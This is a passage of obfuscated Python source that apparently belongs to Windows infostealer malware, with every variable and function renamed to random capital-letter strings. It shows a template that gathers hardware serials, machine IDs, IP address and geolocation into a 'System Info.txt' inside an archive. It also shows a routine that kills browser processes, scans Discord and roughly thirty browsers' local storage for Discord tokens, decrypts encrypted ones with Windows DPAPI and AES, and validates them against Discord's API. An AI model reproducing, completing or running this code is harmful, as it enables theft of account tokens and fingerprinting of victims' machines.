 - GPU : {BZRZZAAATQJVOOORPZOSPAQGHJEOGLIXXFGJHHBAMHNQBVGABWWWNOIFGB}
 - RAM : {VALJXWGLUYAWRBRORFALLRDPACIHINLFNUSSHCQDJFSRMAQZUPRCQACMYETXFGLQFCYDWDXPGBKXIUMTLZILXIFVMTIEDBUS}

Disk:
{SVPOOVJRHJBRLVPWLYZTJMEJUNUERDXTZXKHBYXBKIGIPIYHZXVWKWDXKPQXIVPXKVGSBWSLZUTOZZKBHNXFP}

Serial Number:
 - MAC                       : {EEWHQXZZULAPKXRMEXBDHPMVBKMJRMFTAEEQFRAZPXGRBWCBRCZCYWASDKVGMJLFDIZGVQTWXVAAVYQQYOVOB}
 - Machine Id                : {XZJGKDCBKBRUZCCNVCURSZRNQDGXLMHQJAEJLCFNVKODEHURXRBIORWHKZOZNOFQJBSZCADBFFXNGQBDOOC}
 - Machine Guid              : {NYUUBMHEUJKBHAKGVDMFPJOEHZFHUUCCZVCGESIQLJWNWSGCWMAITTJBKMQPMYPRKAFSKNG}
 - Hw Profile Guid           : {WXXQFJTIXHQCXPLVVMNDBEUVKJTZIAXHOYKJHZUXXLOJIOLOSNWNXCJQFJFDFABTS}
 - Nvidia System Id          : {VYNRBLTZBXQSOACXWVGWSLQKYMFAJROUNQYCZOHIBLXYCXXRZIMYJUKNPJUMXEVUVCBBTFCJVZQTBMOTJDZWVEUAPUSDKCDSMVBT}
 - Guid Serial Number        : {UDOMAVSCMCIXBKXFLPFLAHIKIBYTYZKTPLVAKMPNNNSSDZQYWMSWZRRIDFYBDWFLIZASCYHLQAB}
 - Uuid Serial Number        : {FWMIIMVLJCJXFKXZUAGWDCISDLTKWHFMCHVKZGXRYEHOHFORKAHQUOSEEIOCGHSZWJGVAPJWMDPE}
 - Motherboard Serial Number : {PBQTBQWHOXBUGNRZDYTEXOGVGVGAYGWPJFFONQKTULZYZGGLSYFZEHAFONZDXWKEJRFSNKRFZCYAGDFBSWDSFRR}
 - Motherboard Product       : {QRRYUVSJGXAYJPAHEKTBXZHLDTOHACVLIOZZLGZIOJDYVWOVZBNVXCCOPLY}
 - Motherboard Manufacturer  : {KCCWZJGNAURVIVQCYIFFJEEBVTUXCBRQIQAAXIEEKXJMBZQVAZYTWW}
 - Processor Serial Number   : {FGQSHEYKORDILPLIEJOSWGBLASRWRHBPYFBAEXUUJYXRQLDXRLZULALXJHXLCQA}
 - Bios Serial Number        : {WMTRYXZAIDOBHHRZLQQRIBCDPMAQYFBNHKUQVYGAXGVVYNNVPNTKLGJXARHBLQDCXBOXDVLQSNSLFMUWLNVVRFL}
 - Bios Release Date         : {WZBAXRJONJGOURBASTZRLKERWEVOFXNNOBEHXZXQWVNMNOEZSUWQWYONHPXWLSRYOPKXYWD}
 - Bios Version              : {OTSADPGCXMKAYMBKILSFEWSIZWODNHQPAQKPCYHMWPZFSRIPHBTMWGDKDTBUXTGVHRJAHWASSUTPGPYLOFTBTD}
 - System Bios Version       : {DKRGEOYNKTLTWAPQNARBMUJWZAMMRHKJDNELWDJBHSCCHHIQQKTRZQTTZYDRZ}
 - System Version            : {WVREOIYOZCEEUAFURJXLAGGWZNNUKJUWKFZJEDRSDNOFXELCPNCBOLQJAOQUXZALKKUPFFHPJXACFHMXKCGOCBDJVPLRAAKM}
 - System Family             : {XGBUWJVUWQNIFGYRBNEPRMZLRJWTUHYCQOZGJYOQHPIUQKEBANGNBPAHKGCHZFKIFGKXCVHLGKPZFPK}
 - System Manufacturer       : {JCFVYJMZVBKCUIJGYSRJITNUFBAEKJPULRMLWMMBYEEHUQYUSFBAOELM}
 - System Product            : {MEQVLINDQYMWISVZVPASSDCJRSPSMMXGDWPIGRVWNDXJNDTPQPPCIZEZFPKSPLVSZZZ}
 - System SKU                : {IOFAPPDMMYMSMYFUZGBSZRLXKFARJYSEHHGHPJWGUUQOKJXFGZBNMICJBNHLBESKVZVHXRWNYMYLXZDEJYY}
 - Oem String Serial Number  : {IKEKELJHOQSSLXWORSNGHXOTPYIUYLWUNXULZHDDBDHTJSHKWOZXHXSTONWICBIKBCNOCWVZZOTSXSEEUGNWUPXAMNSXVZFJJZX}
 - Asset Tag Serial Number   : {ECAWMOLCJQTXFCEBWGOAHPBKTMVXMMZAQHMIECNIFRVSLCFKKLEKDWSXCROXZPNCBOZROZDUZXBZKUBVABVVMSLLNMYLUVCDOW}

Ip:
 - Public : {ZAGNRWRFUHPYZVRJGARXWJCOHJTGBBUFCWHSKBFEGSUIVYGZDWU}
 - Local  : {SXSGNHILKSGMLFWLPQZCZMUJQJACCNLXJVPDIJPACMAKERJPAPMBKHNKLB}

Ip Information:
 - Isp : {BARXMIWZMEDCUMXOZBLLHFNOYOEYAKUZODWUDFYFKKZHZLYZBYJPLVSPFWOZCULPMTIW}
 - Org : {GHBYTDJSHUIYVKLFTHCXXFMISNDSPMLWUKVTXJZTCMLSFBSKNKPTZFCUB}
 - As  : {YFXOROAEOKGPAMYEIGDRRWXQDTJUVJWXBROBLONGMJLVLNDWVSGAVNQRXQCSZBZFMCXKXUHLNMOJTEEEXWFRBGFVLM}

Ip Location:
 - Country   : {AYXXHMZGQTZCWWKHEZDNJEFIVTDXVEYKHPNKDNKMMUTDUMHMDAZVAOGUKIPBP} ({AYXXHMZGQTZCWWKHEZDNJEFIVTDXVEYKHPNKDNKMMUTDUMHMDAZVAOGUKIPBP_code})
 - Region    : {BIOPQNGXESHWUWWHSYAYNRDADXDLVXRYSCALVTANPYOWUQZDKECRBGZJLYTBQPXWSHJQJBHQHYGIAJFXCPOCPDHAWMPCMQMA} ({BIOPQNGXESHWUWWHSYAYNRDADXDLVXRYSCALVTANPYOWUQZDKECRBGZJLYTBQPXWSHJQJBHQHYGIAJFXCPOCPDHAWMPCMQMA_code})
 - Zip       : {HKXMQFCIPWIDFCHWUJEYPXOSZVAIMSQVVKRIQFYTWLECYAQNHDGSWTMCSOMJIQKETTSYBAEGSSISNO}
 - City      : {JQJVPDOJTABDXTYBEDNAREXXOHLBOMSHWOOARSMYKYQIKPZPOPWADGRQYZDSEAQO}
 - Timezone  : {NPHOKWOKNTYHRODFXEJTCVFSGJJNHMNQAXBQLTRHOKOOQKWVNBQLUUISHPQXNYMWROPXXQHVZ}
 - Longitude : {PIVQNKBWRJRSOJYXYOBSKGSMYVUVACKCQIYKXZOFDIGUNYUPUBDYIIWMSRBSNONFDKJZMNKGPYIQBZINLHDEUIQLIF}
 - Latitude  : {BBAXEZMIBWHPQJRAWLNFFWHXYNTMQWNOKLBLHUKNABATHBPYUVRENQJKLREMDACJVQMYDPTVQEAFNQBNITPQYIFMTEGPDNUM}
"""
    DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD.writestr("System Info.txt", ZKAUKMEBIKUOSKBGHIYCLRKNJYMOCVPNVPIDCRPYOOEBYAHQYGMHQUORMZYFBFVBTHFHNNKDUXYYEGCSINIGUMCX)

    return HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_system_info

def HUETVNGSPQYJJRBBSIDQZCWMBFGBAGNQGOZBKSTIAPEXCTWNXKMMHSJHWFLDBTWQTWJWOLWKYCVGHJLUZPFBNJPJAS(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD):
    import os
    import re
    import json
    import base64
    import requests
    import psutil
    from Cryptodome.Cipher import AES
    from win32crypt import CryptUnprotectData

    MLCBDAROJZPSDOYHBUDUSAFDHQNZJHDSBRQEWOGRFCYCYYNGTSSWYVFVBRGPDVWSEHOVDJDD = ""
    SNDPREXNQZSQQMUHEFZUGRUEJEMMVFRMIOEBYDLKXSQTNYDORLWFERRIRCIDY = 0

    def EQQWSUGPVGHJUIASKRAIXNYNNHJQPOYXBKHJKNDJGQQYBLABFCUCNFTJDDJYRKNROQHUSMXRFXUICAZWSSZWTRGQNQLP():  
        WALVXFGQGJKFFWZBBNPASYPMBIDHTIAKBFPZDLSYXSNUSHWIYLEAYUNHRKCLHACCZXRFBSJFXA = "https://discord.com/api/v9/users/@me"
        VRQAYXGKFGLREJYKVUKEPGXJLUHQEUXNUOJGLSEBWYMLOZHPPWGLTPMILXILCHBUSDJAFJR = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        VRQAYXGKFGLREJYKVUKEPGXJLUHQEUXNUOJGLSEBWYMLOZHPPWGLTPMILXILCHBUSDJAFJR_enc = r"dQw4w9WgXcQ:[^\"]*"
        FNMYGZRCXTMVFRHAKHPOCRSKAHLFJWVVPLXDUEIQTLUNRPRRMDHWSRCDXDLVOJOMYOQNZRHIHBSJSURHKTF = []
        CETOXSGLJGPGGFQRAIEUIADYJNQMDAKEWUNIQAZMWKUWTMZFPZDLEGSIHBATQZPVETGGSLQBYLWSXVZEHJKIDKIVPDFSVARGL = []
        LVQYCZJSXUVCNUAEBELCPGVXGIOYRKXPGVXEVIWCHDRBKWCDWWERJCKJEQIPZLFTZYUFCWUYVDASRE = {}

        FWMYHMOJKQTFBYQWUFEPDZTNJGAVCMZKKLWITZIPQVYHRNERYPBJNXPYFJYBQYOXOFWYJVRIPWIWLTGUDCRGJFJDIPPASIUDEVW = [
            ("Discord",                os.path.join(WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR, "discord", "Local Storage", "leveldb"),                                                  ""),
            ("Discord Canary",         os.path.join(WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR, "discordcanary", "Local Storage", "leveldb"),                                            ""),
            ("Lightcord",              os.path.join(WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR, "Lightcord", "Local Storage", "leveldb"),                                                ""),
            ("Discord PTB",            os.path.join(WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR, "discordptb", "Local Storage", "leveldb"),                                               ""),
            ("Opera",                  os.path.join(WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR, "Opera Software", "Opera Stable", "Local Storage", "leveldb"),                           "opera.exe"),
            ("Opera GX",               os.path.join(WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR, "Opera Software", "Opera GX Stable", "Local Storage", "leveldb"),                        "opera.exe"),
            ("Opera Neon",             os.path.join(WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR, "Opera Software", "Opera Neon", "Local Storage", "leveldb"),                             "opera.exe"),
            ("Amigo",                  os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Amigo", "User Data", "Local Storage", "leveldb"),                                       "amigo.exe"),
            ("Torch",                  os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Torch", "User Data", "Local Storage", "leveldb"),                                       "torch.exe"),
            ("Kometa",                 os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Kometa", "User Data", "Local Storage", "leveldb"),                                      "kometa.exe"),
            ("Orbitum",                os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Orbitum", "User Data", "Local Storage", "leveldb"),                                     "orbitum.exe"),
            ("CentBrowser",            os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "CentBrowser", "User Data", "Local Storage", "leveldb"),                                 "centbrowser.exe"),
            ("7Star",                  os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "7Star", "7Star", "User Data", "Local Storage", "leveldb"),                              "7star.exe"),
            ("Sputnik",                os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Sputnik", "Sputnik", "User Data", "Local Storage", "leveldb"),                          "sputnik.exe"),
            ("Vivaldi",                os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Vivaldi", "User Data", "Default", "Local Storage", "leveldb"),                          "vivaldi.exe"),
            ("Google Chrome",          os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Google", "Chrome", "User Data", "Default", "Local Storage", "leveldb"),                 "chrome.exe"),
            ("Google Chrome",          os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Google", "Chrome", "User Data", "Profile 1", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Google", "Chrome", "User Data", "Profile 2", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Google", "Chrome", "User Data", "Profile 3", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Google", "Chrome", "User Data", "Profile 4", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Google", "Chrome", "User Data", "Profile 5", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome SxS",      os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Google", "Chrome SxS", "User Data", "Default", "Local Storage", "leveldb"),             "chrome.exe"),
            ("Google Chrome Beta",     os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Google", "Chrome Beta", "User Data", "Default", "Local Storage", "leveldb"),            "chrome.exe"),
            ("Google Chrome Dev",      os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Google", "Chrome Dev", "User Data", "Default", "Local Storage", "leveldb"),             "chrome.exe"),
            ("Google Chrome Unstable", os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Google", "Chrome Unstable", "User Data", "Default", "Local Storage", "leveldb"),        "chrome.exe"),
            ("Google Chrome Canary",   os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Google", "Chrome Canary", "User Data", "Default", "Local Storage", "leveldb"),          "chrome.exe"),
            ("Epic Privacy Browser",   os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Epic Privacy Browser", "User Data", "Local Storage", "leveldb"),                        "epic.exe"),
            ("Microsoft Edge",         os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Microsoft", "Edge", "User Data", "Default", "Local Storage", "leveldb"),                "msedge.exe"),
            ("Uran",                   os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "uCozMedia", "Uran", "User Data", "Default", "Local Storage", "leveldb"),                "uran.exe"),
            ("Yandex",                 os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Yandex", "YandexBrowser", "User Data", "Default", "Local Storage", "leveldb"),          "yandex.exe"),
            ("Yandex Canary",          os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Yandex", "YandexBrowserCanary", "User Data", "Default", "Local Storage", "leveldb"),    "yandex.exe"),
            ("Yandex Developer",       os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Yandex", "YandexBrowserDeveloper", "User Data", "Default", "Local Storage", "leveldb"), "yandex.exe"),
            ("Yandex Beta",            os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Yandex", "YandexBrowserBeta", "User Data", "Default", "Local Storage", "leveldb"),      "yandex.exe"),
            ("Yandex Tech",            os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Yandex", "YandexBrowserTech", "User Data", "Default", "Local Storage", "leveldb"),      "yandex.exe"),
            ("Yandex SxS",             os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Yandex", "YandexBrowserSxS", "User Data", "Default", "Local Storage", "leveldb"),       "yandex.exe"),
            ("Brave",                  os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "BraveSoftware", "Brave-Browser", "User Data", "Default", "Local Storage", "leveldb"),   "brave.exe"),
            ("Iridium",                os.path.join(HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT,   "Iridium", "User Data", "Default", "Local Storage", "leveldb"),                          "iridium.exe"),
        ]

        
        try:
             for HCRCPVLVMSTODENTZNSWAEJGDIOYGBKTKQPFIMIYRCSVMWXYYCLPRCMTODFBTKJMRGJPCF, JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI, v4r_proc_name in FWMYHMOJKQTFBYQWUFEPDZTNJGAVCMZKKLWITZIPQVYHRNERYPBJNXPYFJYBQYOXOFWYJVRIPWIWLTGUDCRGJFJDIPPASIUDEVW:
                for v4r_proc in psutil.process_iter(['pid', 'name']):
                    try:
                        if v4r_proc.name().lower() == v4r_proc_name.lower():
                            v4r_proc.terminate()
                    except: pass
        except: pass

        for HCRCPVLVMSTODENTZNSWAEJGDIOYGBKTKQPFIMIYRCSVMWXYYCLPRCMTODFBTKJMRGJPCF, JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI, v4r_proc_name in FWMYHMOJKQTFBYQWUFEPDZTNJGAVCMZKKLWITZIPQVYHRNERYPBJNXPYFJYBQYOXOFWYJVRIPWIWLTGUDCRGJFJDIPPASIUDEVW:
            if not os.path.exists(JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI):

                continue
            DVWOEPCTAPFIVRZKQYLYUMTASHVOCOGBVSBGRGQLDCHIZHUQXJYFMNUBQXQDAQTY = HCRCPVLVMSTODENTZNSWAEJGDIOYGBKTKQPFIMIYRCSVMWXYYCLPRCMTODFBTKJMRGJPCF.replace(" ", "").lower()
            if "cord" in JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI:
                if not os.path.exists(os.path.join(WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR, DVWOEPCTAPFIVRZKQYLYUMTASHVOCOGBVSBGRGQLDCHIZHUQXJYFMNUBQXQDAQTY, 'Local State')):
                    continue
                for v4r_file_name in os.listdir(JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    IOPTUORVXXAOZGQKENOGHONVMZRTLFXMPPGXHIYBUDJZUVBXTHSEUFZQNJUZFEZWAFRTLGFNHELAJGRKSP = os.path.join(JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI, v4r_file_name)
                    if os.path.exists(IOPTUORVXXAOZGQKENOGHONVMZRTLFXMPPGXHIYBUDJZUVBXTHSEUFZQNJUZFEZWAFRTLGFNHELAJGRKSP):
                        with open(IOPTUORVXXAOZGQKENOGHONVMZRTLFXMPPGXHIYBUDJZUVBXTHSEUFZQNJUZFEZWAFRTLGFNHELAJGRKSP, errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for y in re.findall(VRQAYXGKFGLREJYKVUKEPGXJLUHQEUXNUOJGLSEBWYMLOZHPPWGLTPMILXILCHBUSDJAFJR_enc, v4r_line.strip()):
                                    FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO = MBSNERXDCKYYXOBULWTPIXYBBXCXYSVSPRGGSGQEZQLOLVKOQHOFVPDZVSLCVBVDUKNQOUNTTEFTBTHKXROVal(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), UJBHMAZCWQDNSEXJCGXCLDYWRBOUAAKQEVRCMJGXEWHXHLCNWPXLZOMMKZHIOXRSWCFRCTRMNWOS(os.path.join(WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR, DVWOEPCTAPFIVRZKQYLYUMTASHVOCOGBVSBGRGQLDCHIZHUQXJYFMNUBQXQDAQTY, 'Local State')))
                                    if TNROORJPOGJCGGACTOQRMLRWUELGEFIWZFDADNZUEHOZYIWRXODCYNJTTEHAYGIKBSZURIEOKDRRSSFCFXIFI(FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO, WALVXFGQGJKFFWZBBNPASYPMBIDHTIAKBFPZDLSYXSNUSHWIYLEAYUNHRKCLHACCZXRFBSJFXA):
                                        EMVMHNXKRYAPKGBJOKJJYEHFSASAECQGVFJZQFNVDUNEJJYPYOIOWVVFZFMMMLBEBKKMMUGVYYGLWFJFU = requests.get(WALVXFGQGJKFFWZBBNPASYPMBIDHTIAKBFPZDLSYXSNUSHWIYLEAYUNHRKCLHACCZXRFBSJFXA, headers={'Authorization': FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO}).json()['id']
                                        if EMVMHNXKRYAPKGBJOKJJYEHFSASAECQGVFJZQFNVDUNEJJYPYOIOWVVFZFMMMLBEBKKMMUGVYYGLWFJFU not in CETOXSGLJGPGGFQRAIEUIADYJNQMDAKEWUNIQAZMWKUWTMZFPZDLEGSIHBATQZPVETGGSLQBYLWSXVZEHJKIDKIVPDFSVARGL:
                                            FNMYGZRCXTMVFRHAKHPOCRSKAHLFJWVVPLXDUEIQTLUNRPRRMDHWSRCDXDLVOJOMYOQNZRHIHBSJSURHKTF.append(FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO)
                                            CETOXSGLJGPGGFQRAIEUIADYJNQMDAKEWUNIQAZMWKUWTMZFPZDLEGSIHBATQZPVETGGSLQBYLWSXVZEHJKIDKIVPDFSVARGL.append(EMVMHNXKRYAPKGBJOKJJYEHFSASAECQGVFJZQFNVDUNEJJYPYOIOWVVFZFMMMLBEBKKMMUGVYYGLWFJFU)
                                            LVQYCZJSXUVCNUAEBELCPGVXGIOYRKXPGVXEVIWCHDRBKWCDWWERJCKJEQIPZLFTZYUFCWUYVDASRE[FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO] = (HCRCPVLVMSTODENTZNSWAEJGDIOYGBKTKQPFIMIYRCSVMWXYYCLPRCMTODFBTKJMRGJPCF, IOPTUORVXXAOZGQKENOGHONVMZRTLFXMPPGXHIYBUDJZUVBXTHSEUFZQNJUZFEZWAFRTLGFNHELAJGRKSP)
            else:
                for v4r_file_name in os.listdir(JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    IOPTUORVXXAOZGQKENOGHONVMZRTLFXMPPGXHIYBUDJZUVBXTHSEUFZQNJUZFEZWAFRTLGFNHELAJGRKSP = os.path.join(JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI, v4r_file_name)
                    if os.path.exists(IOPTUORVXXAOZGQKENOGHONVMZRTLFXMPPGXHIYBUDJZUVBXTHSEUFZQNJUZFEZWAFRTLGFNHELAJGRKSP):
                        with open(IOPTUORVXXAOZGQKENOGHONVMZRTLFXMPPGXHIYBUDJZUVBXTHSEUFZQNJUZFEZWAFRTLGFNHELAJGRKSP, errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO in re.findall(VRQAYXGKFGLREJYKVUKEPGXJLUHQEUXNUOJGLSEBWYMLOZHPPWGLTPMILXILCHBUSDJAFJR, v4r_line.strip()):
                                    if TNROORJPOGJCGGACTOQRMLRWUELGEFIWZFDADNZUEHOZYIWRXODCYNJTTEHAYGIKBSZURIEOKDRRSSFCFXIFI(FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO, WALVXFGQGJKFFWZBBNPASYPMBIDHTIAKBFPZDLSYXSNUSHWIYLEAYUNHRKCLHACCZXRFBSJFXA):
                                        EMVMHNXKRYAPKGBJOKJJYEHFSASAECQGVFJZQFNVDUNEJJYPYOIOWVVFZFMMMLBEBKKMMUGVYYGLWFJFU = requests.get(WALVXFGQGJKFFWZBBNPASYPMBIDHTIAKBFPZDLSYXSNUSHWIYLEAYUNHRKCLHACCZXRFBSJFXA, headers={'Authorization': FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO}).json()['id']
                                        if EMVMHNXKRYAPKGBJOKJJYEHFSASAECQGVFJZQFNVDUNEJJYPYOIOWVVFZFMMMLBEBKKMMUGVYYGLWFJFU not in CETOXSGLJGPGGFQRAIEUIADYJNQMDAKEWUNIQAZMWKUWTMZFPZDLEGSIHBATQZPVETGGSLQBYLWSXVZEHJKIDKIVPDFSVARGL:
                                            FNMYGZRCXTMVFRHAKHPOCRSKAHLFJWVVPLXDUEIQTLUNRPRRMDHWSRCDXDLVOJOMYOQNZRHIHBSJSURHKTF.append(FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO)
